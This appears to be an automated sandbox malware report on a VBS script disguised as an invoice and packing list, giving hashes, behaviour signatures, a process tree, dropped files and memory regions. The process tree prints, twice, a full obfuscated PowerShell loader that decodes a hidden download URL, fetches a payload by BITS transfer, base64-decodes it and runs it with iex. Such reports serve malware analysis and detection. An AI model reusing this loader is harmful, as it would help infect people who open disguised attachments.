Analysis

  • max time kernel
    147s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20230712-en
  • resource tags

    arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
  • submitted
    07/08/2023, 18:47

General

  • Target

    INVOICE2023310643_Packing_List__CMR.vbs

  • Size

    16KB

  • MD5

    3739a1cb04d797a12296400184cb660e

  • SHA1

    61f01364e48cbf9af71598a865e2d966aa2f100b

  • SHA256

    d327a71665c7df97c34a5246c79c5ce6a4deccf5e470e048e6ef6c978bb9128a

  • SHA512

    b511d34ad8356adf2ad47c524172e4f05ff315e57c1a9c052026291ae3921cb493a9477825bb3fa987917e4db47265c332c39351c6c65dc8ac98126395603dcb

  • SSDEEP

    384:eMer0TdYUAIZA7fkoyRNJxyYLgLIUENbI2cKrI:evr0eIzhLsmbI2RrI

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\INVOICE2023310643_Packing_List__CMR.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:1996
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Sanaisoler959 ([String]$Subj){For($Overcau=1; $Overcau -lt $Subj.Length-1; $Overcau+=(1+1)){$Talebooktr=$Subj.Substring($Overcau, 1);$merka=$merka+$Talebooktr}$merka;}$Pyro=Sanaisoler959 ' hAtKtDpPsL: /D/IcRdFnO.BdLiTs c oSrbdUalpSp .GcOo md/RaCtctSaMcThNmSePnCtLsA/V1P1C3F6L0A9K4N1B8K2S2H4S7S7 7F6B4 4C1T/S1S1S3p7D8s7m1 1 2A4N9E2D3M9 4B5N1E5S2 /FSSpSrAoBgKfPrAiVnYgD.BdSwBp ';$merka01=Sanaisoler959 ' iBePxM ';$Brneraps = Sanaisoler959 ' \SsGyRsLwBo wT6T4G\CWAiDnPdOo wAsNPboFwOe r SHhseFlblU\Tv 1J.I0p\EpOoHwAePrSssh eSlUlI.PeWxReC ';&($merka01) (Sanaisoler959 'R$acFoBrFrNuFpEtSnFeGsS2T=H$ReDnLvF:AwJiSnVdAi r ') ;&($merka01) (Sanaisoler959 'V$BBsrInce rFa p sS=P$ScNoRrVrCuUpMtOnReSs 2G+L$SBBrTn eSrUaApSsU ') ;&($merka01) (Sanaisoler959 'A$ ASnIdPsEtIsDhGaTfSfM H=O T(B(SgLwFmBis swAiSnF3A2F_Fp rHoAcreDsVsE O-SFH NP rSo cCe sNsSI dB=Q$E{MPfIJDL}k) .ICSoSmUmTa nOdILTiHnFeH)R d-PsRp l iPtN a[Sc hHarrg] 3F4 ');&($merka01) (Sanaisoler959 ' $BGFeCvTaIeA6S5O G=k N$SA nOdts tTsLhSaMfDfA[U$rADn d sktDslhBaIfMfL.BcUo uQnntT- 2S]T ');&($merka01) (Sanaisoler959 's$HA lcpAhMoD=k(BTBeqsFts-IP aKtThP K$dBFrSn ePrCaGpUsS)P -DAKnDdl F(L[iISnmtgPAt r ]L:C:TsViIz en T- eBqM 8 )A ') ;if ($Alpho) {.$Brneraps $Gevae65;} else {;$merka00=Sanaisoler959 ' SStAaBrItS- BCiKt sUTSrCaRnHsSfKegr S-KSToHuUrVcbeP $DPny rCoA K- DFeSsPtSiSnZa tNiTo n M$ScAoJrCrEu p tOn e sA2F ';&($merka01) (Sanaisoler959 ' $VcGoFrCrFu pAtFndeKs 2L=C$AeRnhvP:HaPpRp dBahtDaD ') ;&($merka01) (Sanaisoler959 'UIVmIpToGrUt - M o d uRlMeU PB iAt s Tpr aVnHswfAeBr ') ;$corruptnes2=$corruptnes2+'\Toileda.Bun';while (-not $Campierpl) {&($merka01) (Sanaisoler959 'H$uCIaKm p iSeBr pLlA=s(PTfeCs tI-ZPMaCt ho G$AcPoFrKrOu pHtTnCeSsN2s) ') ;&($merka01) $merka00;&($merka01) (Sanaisoler959 'WSAtGaLrEtS-SSPlDePeFpE C5C ');}&($merka01) (Sanaisoler959 'P$RStaGn aIiBsFo lBeOrA9T5R F= TGTePtC-SCAoMnLtCeAn tK S$ cSoSrFrVu pHt nAeNs 2 ');&($merka01) (Sanaisoler959 'G$sSZtWoAlneBrV2N1 1G S=E M[OSUyPs tCeMmB.MC oSn vEe r tI]C:B:MFCr oPm BAaMsOe 6T4SSBtTrBiGnbgA(D$kSOaLnDaSi sMoAlFe rw9 5V)P ');&($merka01) (Sanaisoler959 'N$Am errPk a 2S =S S[TSRySs tIeHmD. TAeIxstN. E n c oKdAi n g ]O:R:UASSPCDI IE.FGReEtUSHtLr iKnAg (l$ STtVoSlDeVrO2 1 1 )C ');&($merka01) (Sanaisoler959 ' $hRCePgReVlNm sSs iH=O$DmaeDr kba 2 . sfuNbLsAtBrYiLnTgU(B2E3S8O0D6R5T, 1S9B4B3P5L)S ');&($merka01) $Regelmssi;}"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3004
      • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Sanaisoler959 ([String]$Subj){For($Overcau=1; $Overcau -lt $Subj.Length-1; $Overcau+=(1+1)){$Talebooktr=$Subj.Substring($Overcau, 1);$merka=$merka+$Talebooktr}$merka;}$Pyro=Sanaisoler959 ' hAtKtDpPsL: /D/IcRdFnO.BdLiTs c oSrbdUalpSp .GcOo md/RaCtctSaMcThNmSePnCtLsA/V1P1C3F6L0A9K4N1B8K2S2H4S7S7 7F6B4 4C1T/S1S1S3p7D8s7m1 1 2A4N9E2D3M9 4B5N1E5S2 /FSSpSrAoBgKfPrAiVnYgD.BdSwBp ';$merka01=Sanaisoler959 ' iBePxM ';$Brneraps = Sanaisoler959 ' \SsGyRsLwBo wT6T4G\CWAiDnPdOo wAsNPboFwOe r SHhseFlblU\Tv 1J.I0p\EpOoHwAePrSssh eSlUlI.PeWxReC ';&($merka01) (Sanaisoler959 'R$acFoBrFrNuFpEtSnFeGsS2T=H$ReDnLvF:AwJiSnVdAi r ') ;&($merka01) (Sanaisoler959 'V$BBsrInce rFa p sS=P$ScNoRrVrCuUpMtOnReSs 2G+L$SBBrTn eSrUaApSsU ') ;&($merka01) (Sanaisoler959 'A$ ASnIdPsEtIsDhGaTfSfM H=O T(B(SgLwFmBis swAiSnF3A2F_Fp rHoAcreDsVsE O-SFH NP rSo cCe sNsSI dB=Q$E{MPfIJDL}k) .ICSoSmUmTa nOdILTiHnFeH)R d-PsRp l iPtN a[Sc hHarrg] 3F4 ');&($merka01) (Sanaisoler959 ' $BGFeCvTaIeA6S5O G=k N$SA nOdts tTsLhSaMfDfA[U$rADn d sktDslhBaIfMfL.BcUo uQnntT- 2S]T ');&($merka01) (Sanaisoler959 's$HA lcpAhMoD=k(BTBeqsFts-IP aKtThP K$dBFrSn ePrCaGpUsS)P -DAKnDdl F(L[iISnmtgPAt r ]L:C:TsViIz en T- eBqM 8 )A ') ;if ($Alpho) {.$Brneraps $Gevae65;} else {;$merka00=Sanaisoler959 ' SStAaBrItS- BCiKt sUTSrCaRnHsSfKegr S-KSToHuUrVcbeP $DPny rCoA K- DFeSsPtSiSnZa tNiTo n M$ScAoJrCrEu p tOn e sA2F ';&($merka01) (Sanaisoler959 ' $VcGoFrCrFu pAtFndeKs 2L=C$AeRnhvP:HaPpRp dBahtDaD ') ;&($merka01) (Sanaisoler959 'UIVmIpToGrUt - M o d uRlMeU PB iAt s Tpr aVnHswfAeBr ') ;$corruptnes2=$corruptnes2+'\Toileda.Bun';while (-not $Campierpl) {&($merka01) (Sanaisoler959 'H$uCIaKm p iSeBr pLlA=s(PTfeCs tI-ZPMaCt ho G$AcPoFrKrOu pHtTnCeSsN2s) ') ;&($merka01) $merka00;&($merka01) (Sanaisoler959 'WSAtGaLrEtS-SSPlDePeFpE C5C ');}&($merka01) (Sanaisoler959 'P$RStaGn aIiBsFo lBeOrA9T5R F= TGTePtC-SCAoMnLtCeAn tK S$ cSoSrFrVu pHt nAeNs 2 ');&($merka01) (Sanaisoler959 'G$sSZtWoAlneBrV2N1 1G S=E M[OSUyPs tCeMmB.MC oSn vEe r tI]C:B:MFCr oPm BAaMsOe 6T4SSBtTrBiGnbgA(D$kSOaLnDaSi sMoAlFe rw9 5V)P ');&($merka01) (Sanaisoler959 'N$Am errPk a 2S =S S[TSRySs tIeHmD. TAeIxstN. E n c oKdAi n g ]O:R:UASSPCDI IE.FGReEtUSHtLr iKnAg (l$ STtVoSlDeVrO2 1 1 )C ');&($merka01) (Sanaisoler959 ' $hRCePgReVlNm sSs iH=O$DmaeDr kba 2 . sfuNbLsAtBrYiLnTgU(B2E3S8O0D6R5T, 1S9B4B3P5L)S ');&($merka01) $Regelmssi;}"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2264

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          344B

          MD5

          a6a9df95dca8497bc5ed1a0f159c6b9d

          SHA1

          8f3cf11fbe4f2f5cabaa115b8eeefb0e6f93c63e

          SHA256

          410dd1f40fd5c2b157687fd53feed90bcb2758acae145fc453b8be644968ec40

          SHA512

          3b569e507196da6742046ec12a82f013632c755167e7f693ef6b87d666d5a6048a052e58f098d07f71c7081a0f8d398f260e5e094d1d5aae1adebc9cd5449466

        • C:\Users\Admin\AppData\Local\Temp\Cab6E11.tmp

          Filesize

          62KB

          MD5

          3ac860860707baaf32469fa7cc7c0192

          SHA1

          c33c2acdaba0e6fa41fd2f00f186804722477639

          SHA256

          d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904

          SHA512

          d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

        • C:\Users\Admin\AppData\Local\Temp\Tar72E0.tmp

          Filesize

          164KB

          MD5

          4ff65ad929cd9a367680e0e5b1c08166

          SHA1

          c0af0d4396bd1f15c45f39d3b849ba444233b3a2

          SHA256

          c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6

          SHA512

          f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5X0NTGQAB7G2ZI4JOQHC.temp

          Filesize

          7KB

          MD5

          160a4e3770db46a442e4bce168a5bb76

          SHA1

          d45614566e57c35168415c6979ac057f62d8fea8

          SHA256

          75c7f73447027465482349e5343959720f934215bbe74796650284611e34c32d

          SHA512

          a1f73ed435910a8d14e53c15b76f8c3117733a18caf670d17e4bede635530e5545b346ed53801dcf14777e05b9f13849a5ca750892cd85f3dd43c7d5e18c1930

        • memory/2264-84-0x00000000027E0000-0x0000000002820000-memory.dmp

          Filesize

          256KB

        • memory/2264-83-0x00000000738B0000-0x0000000073E5B000-memory.dmp

          Filesize

          5.7MB

        • memory/2264-102-0x00000000027E0000-0x0000000002820000-memory.dmp

          Filesize

          256KB

        • memory/2264-101-0x00000000738B0000-0x0000000073E5B000-memory.dmp

          Filesize

          5.7MB

        • memory/2264-82-0x00000000738B0000-0x0000000073E5B000-memory.dmp

          Filesize

          5.7MB

        • memory/2264-85-0x00000000027E0000-0x0000000002820000-memory.dmp

          Filesize

          256KB

        • memory/3004-87-0x0000000002670000-0x00000000026F0000-memory.dmp

          Filesize

          512KB

        • memory/3004-76-0x000000001B330000-0x000000001B612000-memory.dmp

          Filesize

          2.9MB

        • memory/3004-86-0x000007FEF5BF0000-0x000007FEF658D000-memory.dmp

          Filesize

          9.6MB

        • memory/3004-77-0x0000000002670000-0x00000000026F0000-memory.dmp

          Filesize

          512KB

        • memory/3004-75-0x0000000002670000-0x00000000026F0000-memory.dmp

          Filesize

          512KB

        • memory/3004-74-0x000007FEF5BF0000-0x000007FEF658D000-memory.dmp

          Filesize

          9.6MB

        • memory/3004-98-0x000007FEF5BF0000-0x000007FEF658D000-memory.dmp

          Filesize

          9.6MB

        • memory/3004-99-0x0000000002670000-0x00000000026F0000-memory.dmp

          Filesize

          512KB

        • memory/3004-100-0x0000000002670000-0x00000000026F0000-memory.dmp

          Filesize

          512KB

        • memory/3004-78-0x0000000001FB0000-0x0000000001FB8000-memory.dmp

          Filesize

          32KB

        • memory/3004-79-0x0000000002670000-0x00000000026F0000-memory.dmp

          Filesize

          512KB